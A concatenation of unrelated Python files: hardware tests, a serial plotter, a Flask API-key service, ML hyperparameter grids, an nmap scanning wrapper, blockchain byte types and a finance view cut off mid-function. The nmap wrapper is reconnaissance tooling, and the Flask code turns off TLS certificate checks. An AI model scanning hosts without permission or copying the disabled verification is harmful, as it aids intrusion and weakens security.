    """Basic sanity checks that the cpuid wrappers run and agree with `info`."""
    avx = info.supports_avx  # attribute access must not raise
    def cmp_reg(a, b):
        # ebx appears to be incompletely defined for cpuid(1) call
        for regname in ('eax', 'ecx', 'edx'):
            assert a[regname] == b[regname]
    assert info.reg0 == cpuid(0)
    # reg1 compared field-wise, skipping ebx (see cmp_reg note above).
    cmp_reg(info.reg1, cpuid(1))
    assert info.reg7 == cpuid(7)
    assert info.report() is not None
|
#!/usr/bin/env python
#from https://thepoorengineer.com/en/arduino-python-plot/
from threading import Thread
import serial
import time
import collections
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import struct
import copy
import pandas as pd
import numpy as np
class serialPlot:
    """Live serial-data reader for real-time matplotlib plotting.

    Reads whitespace-separated 'name:value' sample lines from a serial port
    on a background thread and keeps one fixed-length deque of recent values
    per channel for the animation callbacks to consume.
    """
    def __init__(self, serialPort='/dev/ttyUSB0', serialBaud=115200, plotLength=100):
        self.port = serialPort
        self.baud = serialBaud
        self.plotMaxLength = plotLength          # points kept per channel
        self.rawData = ""                        # latest raw line (bytes once the thread runs)
        self.dataType = None
        self.data = []                           # one deque per channel
        self.isRun = True                        # cleared by close() to stop the thread
        self.isReceiving = False                 # set once the first line arrives
        self.thread = None
        self.plotTimer = 0                       # ms between the last two samples
        self.previousTimer = 0
        # self.csvData = []
        print('Trying to connect to: ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
        try:
            self.serialConnection = serial.Serial(serialPort, serialBaud, timeout=4)
            print('Connected to ' + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
            # One sample line determines how many channels to allocate.
            self.numPlots=len(self.serialConnection.readline().decode("utf-8").split())
            print(f"Number of plots is: {self.numPlots}")
            for i in range(self.numPlots): # give an array for each type of data and store them in a list
                self.data.append(collections.deque([0] * plotLength, maxlen=plotLength))
        except:
            # NOTE(review): bare except hides the real error and leaves
            # serialConnection/numPlots unset; later calls will then fail.
            print("Failed to connect with " + str(serialPort) + ' at ' + str(serialBaud) + ' BAUD.')
    def readSerialStart(self):
        """Start the background reader thread and block until data arrives."""
        if self.thread == None:
            self.thread = Thread(target=self.backgroundThread)
            self.thread.start()
            # Block till we start receiving values
            while self.isReceiving != True:
                time.sleep(0.1)
    def getSerialData(self, frame, lines, lineValueText, pltNumber, axes):
        """FuncAnimation callback: append the latest sample and redraw one plot."""
        if pltNumber == 0:  # in order to make all the clocks show the same reading
            currentTimer = time.perf_counter()
            self.plotTimer = int((currentTimer - self.previousTimer) * 1000) # the first reading will be erroneous
            self.previousTimer = currentTimer
            self.privateData = copy.deepcopy(self.rawData)  # so that the 3 values in our plots will be synchronized to the same sample time
        data = self.privateData.decode("utf-8").split()
        # Each token is 'name:value'; pick the token for this subplot.
        value = data[pltNumber].split(':')
        self.data[pltNumber].append(int(value[1]))    # we get the latest data point and append it to our array
        lines.set_data(range(self.plotMaxLength), self.data[pltNumber])
        lineValueText.set_text('[' + value[0] + '] = ' + value[1])
        axes.relim()
        axes.autoscale()
    def backgroundThread(self):    # retrieve data
        """Reader loop: continuously pull lines from the serial port."""
        time.sleep(1.0)  # give some buffer time for retrieving data
        self.serialConnection.reset_input_buffer()
        while (self.isRun):
            self.rawData=self.serialConnection.readline()
            self.isReceiving = True
            # print(self.rawData)
    def close(self):
        """Stop the reader thread and close the serial connection."""
        self.isRun = False
        self.thread.join()
        self.serialConnection.close()
        print('Disconnected...')
        # df = pd.DataFrame(self.csvData)
        # df.to_csv('/home/rikisenia/Desktop/data.csv')
def makeFigure(xLimit, yLimit, subplot):
    """Create a figure with `subplot` axes laid out in a grid sized to fit.

    All axes share the same x/y limits. Supports up to 12 subplots;
    NOTE(review): for subplot > 12 axs[i] stays None and the set_axis_off
    call below will raise AttributeError -- confirm intended behavior.
    """
    xmin, xmax = xLimit
    ymin, ymax = yLimit
    fig = plt.figure()
    axs = [None] * subplot
    for i in range(subplot):
        # Pick a grid shape (rows, cols) big enough for `subplot` axes.
        if subplot == 1:
            axs[i] = fig.add_subplot(1, 1, 1+i)
        elif subplot == 2:
            axs[i] = fig.add_subplot(2, 1, 1+i)
        elif 2 < subplot <= 4:
            axs[i] = fig.add_subplot(2, 2, 1+i)
        elif 4 < subplot <= 6:
            axs[i] = fig.add_subplot(3, 2, 1+i)
        elif 6 < subplot <= 9:
            axs[i] = fig.add_subplot(3, 3, 1+i)
        elif 9 < subplot <= 12:
            axs[i] = fig.add_subplot(3, 4, 1+i)
        else:
            print("Failed to make enough subplots")
        axs[i].set_axis_off()
        axs[i].set_xlim(xmin, xmax)
        axs[i].set_ylim(ymin, ymax)
        axs[i].margins(0.05)
    return fig, axs
def main():
    """Connect to the serial device and run the live multi-channel plot."""
    portName = 'COM5'
    baudRate = 115200
    maxPlotLength = 100     # number of points in x-axis of real time plot
    s = serialPlot(portName, baudRate, maxPlotLength)   # initializes all required variables
    s.readSerialStart()                                 # starts background thread
    # plotting starts below
    pltInterval = 50    # Period at which the plot animation updates [ms]
    xLimit = (0, maxPlotLength)
    yLimit = (0, 100000)
    style = ['m-', 'r-', 'g-','b-', 'k-', 'm-', 'r-', 'g-','b-']    # linestyles for the different plots
    # Pad the style list so every detected channel gets a linestyle.
    while len(style) < s.numPlots:
        style.append('k-')
    # Keep a reference to each animation so they are not garbage-collected.
    anim = []
    fig, axs = makeFigure(xLimit, yLimit, s.numPlots)
    for i in range(s.numPlots):
        lines = axs[i].plot([], [], style[i])[0]
        lineValueText = axs[i].text(0.50, 0.90, '', transform=axs[i].transAxes)
        anim.append(animation.FuncAnimation(fig, s.getSerialData, fargs=(lines, lineValueText, i, axs[i]), interval=pltInterval, blit=False), )  # fargs has to be a tuple
    plt.show()
    s.close()
if __name__ == '__main__':
    main()  # run the live serial plotter when executed as a script
|
"""
Typing.
"""
from typing import Dict, Callable, Tuple, Any, Optional, Set, Generic, TypeVar, Union, List, T
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import ResilientComponent, function, handler, StatusMessage, FunctionResult, FunctionError
PACKAGE_NAME = "fn_sdk_test"
class FunctionComponent(ResilientComponent):
    """Component that implements Resilient function 'utilities_attachment_hash''"""
    def __init__(self, opts):
        """constructor provides access to the configuration options"""
        super(FunctionComponent, self).__init__(opts)
        # Per-package config section from app.config (empty dict if absent).
        self.options = opts.get(PACKAGE_NAME, {})
    @handler("reload")
    def _reload(self, event, opts):
        """Configuration options have changed, save new values"""
        self.options = opts.get(PACKAGE_NAME, {})
    @function("utilities_attachment_hash")
    def _utilities_attachment_hash_function(self, event, *args, **kwargs):
        """Function: Calculate hashes for a file attachment. Returns `md5`, `sha1`, `sha256` and other hashes of the file content. Those hashes can then be used as artifacts or in other parts of your workflows."""
        try:
            # Get the wf_instance_id of the workflow this Function was called in
            wf_instance_id = event.message["workflow_instance"]["workflow_instance_id"]
            yield StatusMessage("Starting 'utilities_attachment_hash' running in workflow '{0}'".format(wf_instance_id))
            # Get the function parameters:
            task_id = kwargs.get("task_id")  # number
            incident_id = kwargs.get("incident_id")  # number
            attachment_id = kwargs.get("attachment_id")  # number
            log = logging.getLogger(__name__)
            log.info("task_id: %s", task_id)
            log.info("incident_id: %s", incident_id)
            log.info("attachment_id: %s", attachment_id)
            ##############################################
            # PUT YOUR FUNCTION IMPLEMENTATION CODE HERE #
            ##############################################
            # NOTE(review): SDK scaffold -- the hashing logic is not yet
            # implemented; the result below is a placeholder.
            yield StatusMessage("Finished 'utilities_attachment_hash' that was running in workflow '{0}'".format(wf_instance_id))
            results = {
                "content": "xyz"
            }
            # Produce a FunctionResult with the results
            yield FunctionResult(results)
        except Exception:
            # FunctionError captures the current exception for the platform.
            yield FunctionError()
|
class Solution:
    # O(n) time | O(n) space - where n is the number of nodes of BST
    def rangeSumBST(self, root: Optional[TreeNode], low: int, high: int) -> int:
        """Sum the values of BST nodes whose value lies in [low, high].

        Uses the BST ordering to prune: left subtrees are skipped when the
        node value is already <= low, right subtrees when it is >= high.
        """
        self.ans = 0
        stack = [root]
        while stack:
            node = stack.pop()
            if not node:
                continue
            if low <= node.val <= high:
                self.ans += node.val
            if node.left and node.val > low:
                stack.append(node.left)
            if node.right and node.val < high:
                stack.append(node.right)
        return self.ans
|
from flask_restful import Resource, reqparse
from models import db, ApiKeys
from requests import get
import datetime
import secrets
import config
from decorators import restricted_api, admin_api
import errors
import logging
logger = logging.getLogger("api")
class ApiKey(Resource):
    # REST resource managing per-user API tokens (table: ApiKeys).
    @restricted_api
    def get(self):
        """
        Retrieve API key of the user
        ---
        tags:
          - User Management
        parameters:
          - in: body
            name: body
            schema:
              required:
                - user
              properties:
                user:
                  type: string
                  description: user of the SOCA user
        responses:
          200:
            description: Return the token associated to the user
          203:
            description: No token detected
          400:
            description: Malformed client input
        """
        parser = reqparse.RequestParser()
        parser.add_argument("user", type=str, location='args')
        args = parser.parse_args()
        user = args["user"]
        if user is None:
            return errors.all_errors("CLIENT_MISSING_PARAMETER", "user (str) parameter is required")
        try:
            # Reuse the existing active token if the user already has one.
            check_existing_key = ApiKeys.query.filter_by(user=user,
                                                         is_active=True).first()
            if check_existing_key:
                return {"success": True, "message": check_existing_key.token}, 200
            else:
                try:
                    # Scope is 'sudo' only if the LDAP service confirms sudo
                    # permission for this user; any other response means 'user'.
                    permissions = get(config.Config.FLASK_ENDPOINT + "/api/ldap/sudo",
                                      headers={"X-SOCA-TOKEN": config.Config.API_ROOT_KEY},
                                      params={"user": user},
                                      verify=False)  # nosec
                    if permissions.status_code == 200:
                        scope = "sudo"
                    else:
                        scope = "user"
                    # secrets.token_hex gives a cryptographically random token.
                    api_token = secrets.token_hex(16)
                    new_key = ApiKeys(user=user,
                                      token=api_token,
                                      is_active=True,
                                      scope=scope,
                                      created_on=datetime.datetime.utcnow())
                    db.session.add(new_key)
                    db.session.commit()
                    return {"success": True,
                            "message": api_token}, 200
                except Exception as err:
                    return errors.all_errors(type(err).__name__, err)
        except Exception as err:
            return errors.all_errors(type(err).__name__, err)
    @restricted_api
    def delete(self):
        """
        Delete API key(s) associated to a user
        ---
        tags:
          - User Management
        parameters:
          - in: body
            name: body
            schema:
              required:
                - user
              properties:
                user:
                  type: string
                  description: user of the SOCA user
        responses:
          200:
            description: Key(s) has been deleted successfully.
          203:
            description: Unable to find a token.
          400:
            description: Client error.
        """
        parser = reqparse.RequestParser()
        parser.add_argument('user', type=str, location='form')
        args = parser.parse_args()
        user = args["user"]
        if user is None:
            return errors.all_errors("CLIENT_MISSING_PARAMETER", "user (str) parameter is required")
        try:
            # Soft delete: tokens are deactivated (is_active=False), not removed.
            check_existing_keys = ApiKeys.query.filter_by(user=user, is_active=True).all()
            if check_existing_keys:
                for key in check_existing_keys:
                    key.is_active = False
                    key.deactivated_on = datetime.datetime.utcnow()
                    db.session.commit()
                return {"success": True, "message": "Successfully deactivated"}, 200
            else:
                return errors.all_errors("NO_ACTIVE_TOKEN")
        except Exception as err:
            return errors.all_errors(type(err).__name__, err)
|
import numpy as np
from sklearn.cluster import FeatureAgglomeration
from sklearn.preprocessing import (
MaxAbsScaler,
MinMaxScaler,
Normalizer,
PolynomialFeatures,
RobustScaler,
StandardScaler,
Binarizer,
)
from sklearn.kernel_approximation import Nystroem, RBFSampler
from sklearn.decomposition import PCA, FastICA
from sklearn.feature_selection import (
SelectFwe,
SelectPercentile,
VarianceThreshold,
f_regression,
)
from sklearn.linear_model import ElasticNetCV, LassoLarsCV
from sklearn.ensemble import (
ExtraTreesRegressor,
GradientBoostingRegressor,
AdaBoostRegressor,
RandomForestRegressor,
)
from sklearn.tree import DecisionTreeRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import LinearSVR
# For comparison, this selection of operators and hyperparameters is
# currently most of what TPOT supports.
reg_config = {
    # Map of sklearn estimator/transformer classes to hyperparameter grids.
    # Keys are the classes themselves; values are dicts of parameter-name ->
    # candidate values. "param_check" entries hold callables that validate a
    # sampled parameter combination.
    # --- Regressors ---
    ElasticNetCV: {
        "l1_ratio": np.arange(0.0, 1.01, 0.05),
        "tol": [1e-5, 1e-4, 1e-3, 1e-2, 1e-1],
    },
    ExtraTreesRegressor: {
        "n_estimators": [100],
        "max_features": np.arange(0.05, 1.01, 0.05),
        "min_samples_split": range(2, 21),
        "min_samples_leaf": range(1, 21),
        "bootstrap": [True, False],
    },
    GradientBoostingRegressor: {
        "n_estimators": [100],
        # NOTE(review): these loss names ("ls", "lad") are the pre-1.0 sklearn
        # spellings — confirm against the pinned sklearn version.
        "loss": ["ls", "lad", "huber", "quantile"],
        "learning_rate": [1e-3, 1e-2, 1e-1, 0.5, 1.0],
        "max_depth": range(1, 11),
        "min_samples_split": range(2, 21),
        "min_samples_leaf": range(1, 21),
        "subsample": np.arange(0.05, 1.01, 0.05),
        "max_features": np.arange(0.05, 1.01, 0.05),
        "alpha": [0.75, 0.8, 0.85, 0.9, 0.95, 0.99],
    },
    AdaBoostRegressor: {
        "n_estimators": [100],
        "learning_rate": [1e-3, 1e-2, 1e-1, 0.5, 1.0],
        "loss": ["linear", "square", "exponential"],
        # 'max_depth': range(1, 11) not available in sklearn==0.19.1
    },
    DecisionTreeRegressor: {
        "max_depth": range(1, 11),
        "min_samples_split": range(2, 21),
        "min_samples_leaf": range(1, 21),
    },
    KNeighborsRegressor: {
        "n_neighbors": range(1, 101),
        "weights": ["uniform", "distance"],
        "p": [1, 2],
    },
    LassoLarsCV: {"normalize": [True, False]},
    LinearSVR: {
        "loss": ["epsilon_insensitive", "squared_epsilon_insensitive"],
        "dual": [True, False],
        "tol": [1e-5, 1e-4, 1e-3, 1e-2, 1e-1],
        "C": [1e-4, 1e-3, 1e-2, 1e-1, 0.5, 1.0, 5.0, 10.0, 15.0, 20.0, 25.0],
        "epsilon": [1e-4, 1e-3, 1e-2, 1e-1, 1.0],
    },
    RandomForestRegressor: {
        "n_estimators": [100],
        "max_features": np.arange(0.05, 1.01, 0.05),
        "min_samples_split": range(2, 21),
        "min_samples_leaf": range(1, 21),
        "bootstrap": [True, False],
    },
    # Preprocessors
    Binarizer: {"threshold": np.arange(0.0, 1.01, 0.05)},
    FastICA: {"tol": np.arange(0.0, 1.01, 0.05)},
    FeatureAgglomeration: {
        "linkage": ["ward", "complete", "average"],
        "affinity": ["euclidean", "l1", "l2", "manhattan", "cosine", "precomputed"],
        # Ward linkage only supports the euclidean metric.
        "param_check": [
            lambda params: (not params["linkage"] == "ward")
            or params["affinity"] == "euclidean"
        ],
    },
    MaxAbsScaler: {},
    MinMaxScaler: {},
    Normalizer: {"norm": ["l1", "l2", "max"]},
    Nystroem: {
        "kernel": [
            "rbf",
            "cosine",
            "chi2",
            "laplacian",
            "polynomial",
            "poly",
            "linear",
            "additive_chi2",
            "sigmoid",
        ],
        "gamma": np.arange(0.0, 1.01, 0.05),
        "n_components": range(1, 11),
    },
    PCA: {"svd_solver": ["randomized"], "iterated_power": range(1, 11)},
    PolynomialFeatures: {
        "degree": [2],
        "include_bias": [False],
        "interaction_only": [False],
    },
    RBFSampler: {"gamma": np.arange(0.0, 1.01, 0.05)},
    RobustScaler: {},
    StandardScaler: {},
    # Selectors
    SelectFwe: {"alpha": np.arange(0, 0.05, 0.001), "score_func": {f_regression: None}},
    SelectPercentile: {"percentile": range(1, 100), "score_func": {f_regression: None}},
    VarianceThreshold: {"threshold": np.arange(0.05, 1.01, 0.05)},
}
|
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException
from time import sleep
class DinoNmap:
    """Convenience wrapper around libnmap for blocking, async and batched scans."""

    def __init__(self):
        pass

    def do_scan(self, targets, options):
        """Run a blocking nmap scan and return the parsed report.

        `targets`: nmap target specification; `options`: nmap CLI options.
        Returns an NmapParser report, or None when parsing fails.
        """
        parsed = None
        nmproc = NmapProcess(targets, options)
        rc = nmproc.run()
        if rc != 0:
            print("nmap scan failed: {0}".format(nmproc.stderr))
        #print(type(nmproc.stdout))
        try:
            parsed = NmapParser.parse(nmproc.stdout)
        except NmapParserException as e:
            # FIX: the original bare `except:` printed `e.msg` without ever
            # binding `e`, raising NameError on any parse failure.
            print("Exception raised while parsing scan: {0}".format(e.msg))
        return parsed

    def print_scan(self, nmap_report):
        """Pretty-print a parsed report in classic nmap output style."""
        print("Starting Nmap {0} at {1}".format(
            nmap_report.version,
            nmap_report.started,
        ))
        for host in nmap_report.hosts:
            # Prefer a hostname when nmap resolved one; fall back to the IP.
            if len(host.hostnames):
                tmp_host = host.hostnames.pop()
            else:
                tmp_host = host.address
            print("Nmap scan report for {0} ({1})".format(
                tmp_host,
                host.address))
            print("Host is {0}.".format(host.status))
            print("  PORT     STATE         SERVICE")
            for serv in host.services:
                pserv = "{0:>5s}/{1:3s}  {2:12s}  {3}".format(
                    str(serv.port),
                    serv.protocol,
                    serv.state,
                    serv.service)
                if len(serv.banner):
                    pserv += " ({0})".format(serv.banner)
                print(pserv)
        print(nmap_report.summary)

    def scan_async(self, targets, options):
        """Run a scan in the background, polling progress, then parse it.

        Returns the parsed report, or None when parsing fails.
        """
        parsed = None
        nmap_proc = NmapProcess(targets, options)
        rc = nmap_proc.run_background()
        while nmap_proc.is_running():
            print("scanning {0}: ETC: {1} DONE: {2}% {3}".format(
                targets,
                nmap_proc.etc,
                nmap_proc.progress,
                nmap_proc.rc,
            ))
            sleep(2)
        try:
            parsed = NmapParser.parse(nmap_proc.stdout)
        except NmapParserException as e:
            # FIX: same unbound-`e` bug as do_scan; also initialise `parsed`
            # so the return below cannot raise UnboundLocalError.
            print("Exception raised while parsing scan: {0}".format(e.msg))
        return parsed

    def background_proc(self, targets, options, event_callback=None):
        """Start a non-blocking scan and return the running NmapProcess."""
        nmap_proc = NmapProcess(targets, options, event_callback)
        nmap_proc.run_background()
        return nmap_proc

    def scan_many(self, targets, options):
        """Scan each target concurrently and return the parsed reports."""
        still_running = True
        results = []
        results_parsed = []
        for target in targets:
            # FIX: original called bare `background_proc(...)`, which is a
            # NameError — it is a method on self.
            results.append(self.background_proc(target, options))
        while still_running:
            count_running = 0
            for process in results:
                if process.is_running():
                    count_running += 1
            if count_running == 0:
                still_running = False
            else:
                #print("{} running".format(count_running))
                sleep(1)
        for result in results:
            parsed = NmapParser.parse(result.stdout)
            results_parsed.append(parsed)
        return results_parsed

    def scan_list(self, targets):
        """ returns a list of IPs nmap would scan (-sL) """
        report = self.do_scan(targets, "-sL")
        # FIX: do_scan may return None on parse failure; the original then
        # crashed with AttributeError on `.hosts`.
        if report is None:
            return []
        return [host.address for host in report.hosts]
|
import base64
from abc import ABCMeta
from enum import Enum
from typing import Union
class Bytes(bytes):
    """bytes subclass with an optional fixed size and textual hex prefix."""
    size = None    # expected payload length in bytes; None = unrestricted
    prefix = None  # textual prefix prepended by hex_xx(); None = no prefix

    def __new__(cls, *args, **kwargs):
        self = super().__new__(cls, *args, **kwargs)
        # Enforce the subclass-declared fixed size, when one is set.
        if cls.size is not None and cls.size != len(self):
            raise RuntimeError
        return self

    def __repr__(self):
        type_name = type(self).__qualname__
        return type_name + "(" + super().__repr__() + ")"

    def __str__(self):
        type_name = type(self).__qualname__
        return type_name + "(" + self.hex_xx() + ")"

    def hex_xx(self):
        """Return the hex string, with the class prefix when one is declared."""
        if self.prefix:
            return self.prefix + self.hex()
        return self.hex()

    @classmethod
    def fromhex(cls, value: str, ignore_prefix=False, allow_malformed=False):
        """Parse a (possibly prefixed) lowercase hex string into this type.

        Raises ValueError on bad prefix/size/case unless `allow_malformed`,
        in which case a MalformedStr wrapper is returned instead.
        """
        # FIX: the original tested `isinstance(cls, Address)`, which is always
        # False because `cls` is a class object, never an Address *instance* —
        # so the ABC guard could never fire. Compare the class identity.
        if cls is Address:
            raise TypeError("Address.fromhex() cannot be used. Because Address is ABC.")
        try:
            if cls.prefix and not ignore_prefix:
                prefix, contents = value[:len(cls.prefix)], value[len(cls.prefix):]
                if prefix != cls.prefix:
                    raise ValueError(f"Invalid prefix. {cls.__qualname__}, {value}")
            else:
                contents = value
            if len(contents) != cls.size * 2:
                raise ValueError(f"Invalid size. {cls.__qualname__}, {value}")
            if contents.lower() != contents:
                raise ValueError(f"All elements of value must be lower cases. {cls.__qualname__}, {value}")
            return cls(bytes.fromhex(contents))
        except Exception:
            # FIX: narrowed the original bare `except:` so that
            # KeyboardInterrupt/SystemExit are no longer swallowed.
            if not allow_malformed:
                raise
            return MalformedStr(cls, value)
class VarBytes(Bytes):
    # Variable-length bytes rendered with a '0x' prefix (size stays None).
    prefix = '0x'
    def hex_0x(self):
        # Explicit 0x-prefixed hex; equals hex_xx() for this class since
        # prefix is always '0x'.
        return self.prefix + self.hex()
class Hash32(VarBytes):
    # Fixed 32-byte value rendered as 0x-prefixed hex (size enforced by Bytes.__new__).
    size = 32
class Address(Bytes, metaclass=ABCMeta):
    """Abstract 20-byte address; concrete forms are hx/cx-prefixed subclasses."""
    size = 20

    @classmethod
    def fromhex_address(cls, value: str, allow_malformed=False):
        """Parse an 'hx...'/'cx...' hex string into the matching subclass.

        FIX: `value` was annotated as int, but it is sliced and lower-cased
        as a string throughout — the annotation is corrected to str.
        Returns MalformedStr(cls, value) instead of raising when
        `allow_malformed` is True.
        """
        try:
            prefix, contents = value[:2], value[2:]
            if len(contents) != cls.size * 2:
                raise ValueError(f"Invalid size. {cls.__qualname__}, {value}")
            if contents.lower() != contents:
                raise ValueError(f"All elements of value must be lower cases. {cls.__qualname__}, {value}")
            # Dispatch on the two known prefixes.
            if prefix == ContractAddress.prefix:
                return ContractAddress(bytes.fromhex(contents))
            if prefix == ExternalAddress.prefix:
                return ExternalAddress(bytes.fromhex(contents))
            raise ValueError(f"Invalid prefix. {cls.__qualname__}, {value}")
        except Exception:
            # Narrowed from a bare `except:` (keeps KeyboardInterrupt alive).
            if not allow_malformed:
                raise
            return MalformedStr(cls, value)
class ExternalAddress(Address):
    # Externally-owned (user) address; rendered with the 'hx' prefix.
    prefix = "hx"
    def hex_hx(self):
        # 'hx'-prefixed hex string; same output as hex_xx() for this class.
        return self.prefix + self.hex()
class ContractAddress(Address):
    # Contract (score) address; rendered with the 'cx' prefix.
    prefix = "cx"
    def hex_cx(self):
        # 'cx'-prefixed hex string; same output as hex_xx() for this class.
        return self.prefix + self.hex()
class Signature(Bytes):
    """65-byte recoverable signature: 64 signature bytes plus 1 recovery-id byte."""
    size = 65

    def recover_id(self):
        # The recovery id occupies the final byte.
        return self[-1]

    def signature(self):
        # Everything except the trailing recovery-id byte.
        return self[:-1]

    def to_base64(self):
        return base64.b64encode(self)

    def to_base64str(self):
        return self.to_base64().decode('utf-8')

    def __str__(self):
        return "{}({})".format(type(self).__qualname__, self.to_base64str())

    @classmethod
    def from_base64(cls, base64_bytes: bytes):
        """Build a Signature from base64-encoded bytes."""
        return Signature(base64.b64decode(base64_bytes))

    @classmethod
    def from_base64str(cls, base64_str: str):
        """Build a Signature from a base64-encoded str."""
        return cls.from_base64(base64_str.encode('utf-8'))
class MalformedStr:
    """Wrapper preserving a raw string that failed to parse as `origin_type`.

    Every representation accessor simply echoes the raw value, so malformed
    input round-trips unchanged through serialization.
    """

    def __init__(self, origin_type, value):
        self.origin_type = origin_type
        self.value = value

    def hex(self):
        return self.value

    # The prefixed/typed variants have nothing to reformat: alias them all
    # to the raw-value accessor.
    hex_xx = hex
    hex_hx = hex
    hex_0x = hex
    str = hex

    def __eq__(self, other):
        # Equal only to another MalformedStr with identical type and value.
        return (type(other) is type(self)
                and (self.origin_type, self.value) == (other.origin_type, other.value))

    def __hash__(self):
        return hash(self.value) ^ hash(self.origin_type)

    def __repr__(self):
        return f"{type(self).__qualname__}({self.origin_type.__qualname__}, {self.value!r})"

    def __str__(self):
        return f"{type(self).__qualname__}({self.origin_type.__qualname__}, {self.value})"
def int_fromhex(value: str):
    """Parse a lowercase hex string containing '0x' into an int.

    Non-str input raises ValueError; strings without a '0x' marker, with
    uppercase characters, or that fail int() parsing are wrapped in
    MalformedStr instead of raising.
    """
    if not isinstance(value, str):
        raise ValueError(f"This is not string. {value}")
    has_marker = value != value.replace("0x", "")
    is_lower = value == value.lower()
    if has_marker and is_lower:
        try:
            return int(value, 16)
        except ValueError:
            pass
    return MalformedStr(int, value)
def int_tohex(value: Union[int, MalformedStr]):
    """Render an int as 0x-hex; a MalformedStr echoes its raw value."""
    return hex(value) if isinstance(value, int) else value.hex_xx()
def int_fromstr(value: Union[str, int]):
    """Parse a base-10 int; unparseable input is wrapped in MalformedStr."""
    try:
        parsed = int(value)
    except ValueError:
        return MalformedStr(int, value)
    return parsed
def int_tostr(value: Union[int, MalformedStr]):
    """Render an int as a decimal string; a MalformedStr echoes its raw value."""
    return str(value) if isinstance(value, int) else value.str()
class TransactionStatusInQueue(Enum):
    # Lifecycle states of a transaction while queued/processed.
    normal = 1
    fail_validation = 2
    fail_invoke = 3
    added_to_block = 4
    precommited_to_block = 5  # (sic) member name kept as-is: it is public API
|
from .omdb import get_omdb_movie
from .tmdb import get_tmdb_movie, get_tmdb_genre, get_tmdb_details
def get_api(title, year, external_api="omdb"):
    """Fetch movie metadata from OMDb or TMDb and normalise it into one dict.

    `title`/`year` identify the movie; `external_api` selects the backend
    ("omdb" or "tmdb"). Returns a dict whose 'response' field is the string
    'True' on success and 'False' (or the initial False) otherwise; fields
    TMDb does not provide are set to "unsupported".
    """
    item = {
        "title": None,
        "genre": None,
        "imdb": None,
        "runtime": None,
        "tomato": None,
        "year": None,
        "awards": None,
        "cast": None,
        "director": None,
        "poster": None,
        "description": None,
        "response": False
    }
    if external_api == "omdb":
        omdb = get_omdb_movie(title, year)
        if omdb is not None and omdb['Response'] == 'True':
            item["title"] = omdb["Title"]
            item["genre"] = omdb["Genre"]
            item["imdb"] = omdb["imdbRating"]
            item["runtime"] = omdb["Runtime"]
            item["tomato"] = get_rotten_score(omdb)
            item["year"] = omdb["Year"]
            item["awards"] = omdb["Awards"]
            item["cast"] = omdb["Actors"]
            item["director"] = omdb["Director"]
            item["poster"] = omdb["Poster"]
            item["description"] = omdb["Plot"]
            item['response'] = omdb["Response"]
        else:
            item['response'] = 'False'
    elif external_api == "tmdb":
        tmdb = get_tmdb_movie(title, year)
        # FIX: the original indexed tmdb["results"][0] before checking for a
        # None response, raising an uncaught TypeError on a failed lookup.
        if tmdb is None or not tmdb["results"]:
            item['response'] = 'False'
        else:
            first = tmdb["results"][0]
            tmdb_details = get_tmdb_details(first['id'])
            poster_path = first['poster_path']
            item["title"] = first['title']
            item["year"] = first['release_date'].split('-', 1)[0]
            item["genre"] = get_tmdb_genre(first['genre_ids'])
            item["imdb"] = "unsupported"
            item["runtime"] = tmdb_details['runtime']
            item["tomato"] = "unsupported"
            item["awards"] = "unsupported"
            item["cast"] = "unsupported"
            item["director"] = "unsupported"
            item["poster"] = "http://image.tmdb.org/t/p/w185" + str(poster_path)
            item['response'] = 'True'
    return item
def get_rotten_score(item):
    """Extract the Rotten Tomatoes rating string from an OMDb payload.

    OMDb places the Rotten Tomatoes entry (when present) second in the
    'Ratings' list. Returns the rating value (e.g. '93%') or 'N/A' when the
    list is missing, too short, or holds a different source there.
    """
    try:
        rating = item['Ratings'][1]
        if rating['Source'] == "Rotten Tomatoes":
            return rating['Value']
        return "N/A"
    except (IndexError, KeyError):
        # FIX: the original caught only IndexError, so a payload without a
        # 'Ratings' key (common for obscure titles) raised KeyError.
        return "N/A"
|
"""
Displays overview financial data (cash flow)
"""
import curses
from app.const import NC_COLOR_TAB, NC_COLOR_TAB_SEL
from app.methods import format_currency, ellipsis, alignr
from app.page import Page
class PageOverview(Page):
    """ Page class to display overview data """
    def __init__(self, win, api, set_statusbar):
        # Table columns as [header, width-in-characters] pairs.
        self.cols = [
            ["Month", 8],
            ["In", 10],
            ["Out", 10],
            ["Net", 10],
            ["Predicted", 12],
            ["Balance", 10]
        ]
        # Spending categories whose future months are predicted from averages.
        self.future_cols = ['food', 'general', 'holiday', 'social']
        super().__init__(win, api, set_statusbar)
    def get_data(self):
        # Fetch the overview dataset from the API; calculate_data() consumes
        # its 'startYearMonth', 'endYearMonth', 'currentYear', 'currentMonth'
        # and 'cost' keys.
        res = self.api.req(['data', 'overview'])
        return res['data']
    def calculate_data(self):
        """ calculates future spending data based on past averages """
        # calculate table values
        year_month_start = self.data['startYearMonth']
        year_month_end = self.data['endYearMonth']
        year_month_now = self.data['currentYear'], self.data['currentMonth']
        # number of months (inclusive) since the start month
        num_rows = 12 * (year_month_end[0] - year_month_start[0]) + \
                year_month_end[1] - year_month_start[1] + 1
        months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", \
                "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
        # calculate futures based on averages
        # future_key = number of months elapsed up to and including the
        # current month; rows at index >= future_key are in the future.
        future_key = 12 * (year_month_now[0] - year_month_start[0]) + \
                year_month_now[1] - year_month_start[1] + 1
        # per-category mean of past spending, used for future months
        average = [
            sum([self.data['cost'][col][i] for i in range(future_key)]) / future_key
            for col in self.future_cols
        ]
        # total outgoings per month: actuals for the past, category averages
        # for the future, plus bills (always actual/known)
        out_with_future = [
            sum([self.data['cost'][col][i] if i < future_key else average[index] \
                for (index, col) in enumerate(self.future_cols)]) \
            + self.data['cost']['bills'][i]
            for i in range(num_rows)
        ]
        # net spending
        net = [
            self.data['cost']['income'][i] - out_with_future[i]
            for i in range(num_rows)
        ]
        # calculate predicted balance based on future spending predictions
        # NOTE(review): past rows use the previous month's actual balance
        # plus this month's net — confirm this matches the web client.
        predicted = [
            self.data['cost']['balance'][max(0, i - 1)] + net[i]
            for i in range(future_key + 1)
        ]
        # beyond the current month, compound the prediction forward
        for i in range(future_key + 1, num_rows):
            predicted.append(int(predicted[i - 1] + net[i]))
